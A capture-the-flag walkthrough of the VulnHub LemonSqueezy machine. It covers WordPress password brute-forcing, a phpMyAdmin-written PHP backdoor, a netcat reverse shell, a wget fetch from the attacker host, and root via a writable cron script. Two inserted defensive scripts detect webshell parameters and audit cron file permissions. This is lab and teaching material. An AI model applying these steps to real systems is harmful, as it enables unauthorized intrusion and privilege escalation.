LemonSqueezy Walkthrough

Today we're going to do a boot2root pentest walkthrough of the LemonSqueezy machine, created by James Hay and hosted at https://www.vulnhub.com/entry/lemonsqueezy-1,473/.

For this pentest, we'll be using two virtual machines: a Kali Linux machine as the attacking system, and the LemonSqueezy machine as the target.

Locating the Target

The first thing we'll do is locate the target machine by running netdiscover from our attacking system.


Looks like 10.0.2.19 is our target.

Additional Configuration

The documentation for this machine tells us to add lemonsqueezy to our hosts file. That means we're going to use gedit to edit the /etc/hosts file on our attacking machine, mapping the name lemonsqueezy to the target's IP address, like so.


Scanning and Enumeration

We start our scans with a quick nmap scan on the target to determine which TCP and UDP ports are open.


Looks like ports 80 and 5353 are open. We run another nmap scan on these ports specifically to see if we can get more info, but don't get very much. Our Nikto scan reveals a little more, though.


We found the phpmyadmin directory. Next, our dirb scan also reveals a possible avenue for enumeration.


Wordpress is a common CMS (Content Management System) app that can be enumerated for possible ways into the system.

Finding a Way In

Knowing that Wordpress is installed on the target system, we can use Wpscan to enumerate potentially vulnerable themes and add-ons installed on Wordpress, and to enumerate registered users.



No vulnerable themes or add-ons, but we've managed to identify two users in the app, lemon and orange. Next, we'll use Wpscan again to try to brute-force the passwords for those users.



We managed to get the password for orange, and we use these credentials to log in to the Wordpress page. It turns out that there's a saved draft message in the account with what looks like a password.


This could be the password for lemon on Wordpress, or it could be a password for a user on the phpmyadmin page. After some trial and error, it turns out that this password is orange's password for phpmyadmin, so we log in.

Now that we have an authenticated login to phpmyadmin, we can try using SQL injection to create a PHP file that we can then use for PHP command injection. The first step is to click on the SQL tab on the phpmyadmin page.


Then we inject the above SQL command into the console, creating a new PHP page at lemonsqueezy/wordpress/. If we navigate to the page, it's blank, but if we append ?cmd= to the URL, whatever we append will be interpreted as a command to the webserver's OS. For example, if we append ?cmd=whoami to the URL, this happens.
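Both of the steps above leave a clear trail in the web server's access log: a burst of POSTs to wp-login.php from one address (the Wpscan password attack), and then GET requests to a PHP file that never existed in the Wordpress tree, carrying a cmd= parameter. The script below is an added example written for this walkthrough, not part of the original post or of any tool it uses; it parses constructed Apache combined-format log lines (the IPs, timestamps and user agents are placeholders) and flags both patterns. The list of parameter names beyond cmd is an assumption about what minimal PHP shells commonly use.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache "combined" format. They are not taken from
# the walkthrough; the IPs, timestamps and user agents are placeholders.
SAMPLE_LOG = """\
10.0.2.4 - - [01/Jan/2021:10:00:01 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4512 "-" "Mozilla/5.0 (placeholder)"
10.0.2.4 - - [01/Jan/2021:10:00:01 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4512 "-" "Mozilla/5.0 (placeholder)"
10.0.2.4 - - [01/Jan/2021:10:00:02 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4512 "-" "Mozilla/5.0 (placeholder)"
10.0.2.4 - - [01/Jan/2021:10:00:02 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4512 "-" "Mozilla/5.0 (placeholder)"
10.0.2.4 - - [01/Jan/2021:10:00:03 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (placeholder)"
10.0.2.4 - - [01/Jan/2021:10:05:10 +0000] "GET /wordpress/backdoor.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (placeholder)"
10.0.2.4 - - [01/Jan/2021:10:05:30 +0000] "GET /wordpress/backdoor.php?cmd=whoami HTTP/1.1" 200 9 "-" "Mozilla/5.0 (placeholder)"
10.0.2.4 - - [01/Jan/2021:10:05:45 +0000] "GET /wordpress/backdoor.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0 (placeholder)"
10.0.2.7 - - [01/Jan/2021:10:07:00 +0000] "GET /wordpress/?p=1 HTTP/1.1" 200 8800 "-" "Mozilla/5.0 (placeholder)"
10.0.2.7 - - [01/Jan/2021:10:08:00 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (placeholder)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Query-string parameter names used by minimal PHP command shells. "cmd" is
# the one seen in the walkthrough; the others are an assumed extension.
SHELL_PARAMS = {"cmd", "command", "exec"}


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["query"] = parse_qs(parts.query)
    return entry


def find_login_bruteforce(entries, threshold=4):
    """Flag IPs that POST to wp-login.php at least `threshold` times.

    WordPress answers a failed login with 200 (the form is re-rendered) and a
    successful one with a 302 redirect, so a run of 200s followed by a 302 from
    one address suggests a guessed password rather than a user typo.
    """
    per_ip = defaultdict(lambda: {"failed": 0, "succeeded": 0})
    for e in entries:
        if e["method"] == "POST" and e["path"].endswith("/wp-login.php"):
            key = "succeeded" if e["status"] == 302 else "failed"
            per_ip[e["ip"]][key] += 1
    return {ip: c for ip, c in per_ip.items()
            if c["failed"] + c["succeeded"] >= threshold}


def find_command_params(entries):
    """Return requests whose query string carries a webshell-style parameter."""
    hits = []
    for e in entries:
        for name in sorted(SHELL_PARAMS.intersection(e["query"])):
            hits.append({"ip": e["ip"], "path": e["path"],
                         "param": name, "value": e["query"][name][0]})
    return hits


def triage(log_text):
    """Run both detections over raw log text and return their findings."""
    entries = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    return {"bruteforce": find_login_bruteforce(entries),
            "webshell": find_command_params(entries)}


if __name__ == "__main__":
    report = triage(SAMPLE_LOG)
    for ip, counts in report["bruteforce"].items():
        print(f"login brute-force from {ip}: {counts}")
    for hit in report["webshell"]:
        print(f"webshell-style request from {hit['ip']}: {hit['path']} {hit['param']}={hit['value']}")
```

On a real server you would feed this the access log (for Apache on Debian, /var/log/apache2/access.log) and also alert on any .php file under the web root that is not part of the Wordpress install, since that is what the SQL step created.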


This means that command injection resolved properly. Next, we'll inject a bash command that gives us a reverse shell on the target system, but first we have to set up a netcat listener on our attacking system.


After that's taken care of, we can send the following command through our backdoor.php page.


Which opens up the reverse shell on our attacking system.


Privilege Escalation

The first thing we do after the shell opens is upgrade to a TTY shell by running a Python one-liner command. After that, it's time to do some enumeration.

We run which python from the command line, and good for us, Python can be run on this system.  That means we can use our linuxprivchecker.py script to do a lot of the heavy lifting for us in enumerating the system.

We already have linuxprivchecker.py on our attacking system, so the first step is setting up a web server from which the script can be downloaded. We can run a Python command from our attacking system that makes the files in our /root/ directory available for download.


Then, from the target system, we navigate to a directory where we have write permissions. Normally, it's safe to use /tmp/ for this, but not on this system. Turns out our safe directory is /var/www/html/wordpress/. Once there, we run wget 10.0.2.4/linuxprivchecker.py to get our script, then python linuxprivchecker.py | more to get started.



logrotate is one of the few files that we have write permissions for, and it's also being run as root at intervals by the target system. That's a good lead. Let's find out what that file is.


This is a Python script that removes all the files from the /tmp/ directory. We can edit this file to run a script of our choosing, and that means we'll use the script to open another remote shell to our attacking system, but this time the shell will have root privileges. This is a two-step process. The first step is to set up another netcat listener on our attacking system, nc -nlvp 4343, followed by a tedious overwriting of the logrotate file, because the text editors on the target system weren't working.
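The root cause here is a scheduled job running as root whose script file is writable by an unprivileged user; linuxprivchecker.py found it by brute-force listing permissions. The audit script below is an added example written for this walkthrough (it is not part of the original post, of linuxprivchecker.py, or of any distribution tool): it parses system-crontab entries, collects every absolute path a root job executes, and reports any file that is group- or world-writable, not owned by the expected uid, or sitting in a world-writable directory without the sticky bit. The demo builds its own temp directory with one locked-down script and one 0777 file named logrotate, so it runs offline; on a real host you would feed it /etc/crontab and /etc/cron.d/* with the default owner_uid of 0. Per-user crontabs and run-parts directories are out of scope for this example.

```python
import os
import re
import stat
import tempfile

# System-crontab format (/etc/crontab, /etc/cron.d/*): five time fields, a
# user name, then the command line.
CRON_RE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<command>.+)$")

# Tokens after which the rest of a cron command is redirection or another command.
SHELL_OPERATORS = {">", ">>", "2>&1", "|", ";", "&&", "||"}


def scheduled_paths(crontab_text):
    """Yield (user, absolute_path) for every path token a cron entry executes.

    Interpreter and script tokens are both reported: a writable interpreter is
    as dangerous as a writable script.
    """
    for line in crontab_text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].startswith("#") or "=" in tokens[0]:
            continue  # blank, comment, or VAR=value line
        m = CRON_RE.match(line)
        if not m:
            continue  # @reboot-style or malformed entries are out of scope here
        for tok in m.group("command").split():
            if tok in SHELL_OPERATORS or tok.startswith(">"):
                break
            if tok.startswith("/"):
                yield m.group("user"), tok


def audit_path(path, owner_uid=0):
    """Return the list of problems with a file that cron runs as root.

    owner_uid is the uid the file should belong to: 0 (root) on a real system.
    The demo below passes its own uid because it owns the temp files it makes.
    """
    problems = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing (a writable parent directory would let anyone create it)"]
    if st.st_uid != owner_uid:
        problems.append(f"owned by uid {st.st_uid}, expected {owner_uid}")
    if st.st_mode & stat.S_IWGRP:
        problems.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    parent = os.stat(os.path.dirname(path) or "/")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        problems.append("parent directory world-writable without sticky bit")
    return problems


def audit_crontab(crontab_text, owner_uid=0):
    """Map each path run by a root cron job to its problems (clean paths omitted)."""
    findings = {}
    for user, path in scheduled_paths(crontab_text):
        if user != "root":
            continue  # jobs that run as other users do not hand out root
        problems = audit_path(path, owner_uid)
        if problems:
            findings[path] = problems
    return findings


def demo():
    """Constructed scenario: one properly locked-down script and one file that
    is writable by everyone, as on the walkthrough's target.
    Returns (findings, safe_path, weak_path)."""
    d = tempfile.mkdtemp()
    safe = os.path.join(d, "cleanup.py")
    weak = os.path.join(d, "logrotate")
    for p in (safe, weak):
        with open(p, "w") as f:
            f.write("#!/usr/bin/env python\n")
    os.chmod(safe, 0o755)
    os.chmod(weak, 0o777)  # the misconfiguration that gave away root
    crontab = (
        "SHELL=/bin/sh\n"
        "# m h dom mon dow user command\n"
        f"*/5 * * * * root {weak}\n"
        f"0 3 * * * root {safe} > /var/log/cleanup.log 2>&1\n"
        f"0 4 * * * www-data {weak}\n"
    )
    return audit_crontab(crontab, owner_uid=os.geteuid()), safe, weak


if __name__ == "__main__":
    findings, _, _ = demo()
    for path, problems in findings.items():
        print(f"{path}: {', '.join(problems)}")
```

The fix on the target side is the mirror image of the check: anything root's cron executes should be owned by root with mode 0755 or 0644 and live in a directory only root can write to.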


The complete Python script is highlighted above. In hindsight, it would have been easier to prepare the script on our attacking system, then download it to the target system and swap the two files. In any case, a little while after completing the script, it executed on the target system, opening up our remote shell on our attacking system, this time with root privileges. Now the last thing to do before we finish is to locate and cat out the flag file. It's usually in the /root/ directory.


Summary

After our initial scans, we were able to enumerate the Wordpress app, getting user login info and then phpmyadmin credentials from info we found in the user accounts. Once logged into the phpmyadmin page, we were able to use SQL injection to gain a remote shell on the target system. On the target system, we were able to use an enumeration script to identify a writable script file that ran at intervals as root, so we modified it to give us another remote shell, this time with root privileges. From this new remote shell, we were able to locate the flag file and print it out.

Finish